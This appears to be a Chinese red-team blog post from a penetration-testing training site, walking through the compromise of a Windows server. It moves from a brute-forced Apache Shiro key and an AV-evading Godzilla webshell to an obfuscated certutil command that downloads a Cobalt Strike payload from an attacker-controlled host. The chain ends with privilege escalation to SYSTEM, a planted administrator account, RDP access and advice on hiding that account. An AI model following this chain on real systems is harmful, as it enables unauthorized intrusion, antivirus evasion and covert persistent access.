1. 首页
  2. 红队技术

实战 | Shiro漏洞到远程桌面(火绒)

【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。

1.在一个风和日丽早上挖掘src时浏览到了一个存在shiro框架的系统


2.看到Shirocookie果断爆破密钥

3.爆破密钥成功:Z3VucwAAAAAAAAAAAAAAAA==

利用链是CB1,回显方式是tomcat

4.上传哥斯拉webshell免杀马,因为之前的马都被火绒杀了,看到这个说明上传成功 链接:https://github.com/Tas9er/ByPassGodzilla

5.连接木马文件

Os.name: Windows Server 2008 R2 os.version: 6.1 os.arch: amd64

6.tasklist/SVC展示进程,发现火绒杀毒软件



后渗透:

1.生成cobaltstrike exe文件

                                   2.显示上传成功实际并没有

并没有exe文件上传成功,powershell也被禁用,常规的远程下载肯定被禁止,在一筹莫展之际想到了之前遇到的这种情况

3.先对CSexe做免杀,这里使用bypassAV插件(下方),注意生成powershell2的木马,因为win2008自带

链接:https://github.com/cseroad/bypassAV

4.再使用绕过语句做远程下载(一般杀毒检测不到) “c””e””r””t””u””t””i””l”-“u””r””l””c””a””c””h””e”-split-f  http://XXXX:8888/bhe.exe

5.开启服务器临时端口,把CS木马文件放在目录下会自动下载

python -m http.server 8888

6.运行免杀木马CS上线成功,目前还是administrators权限

7.利用提权插件提权到SYSTEM

8.收集内部资产

为横向移动做准备

10.添加用户到administrators组

noNetApiAdd.exe -u admin123 -p admin -g administrators

11.查看远程rdp端口,不一定是3389默认端口,为3390

远程成功

后期可以利用注册表隐藏admin123账户,实现无痕登录

原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/8041.html

联系我们

400-800-8888

在线咨询:点击这里给我发消息

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息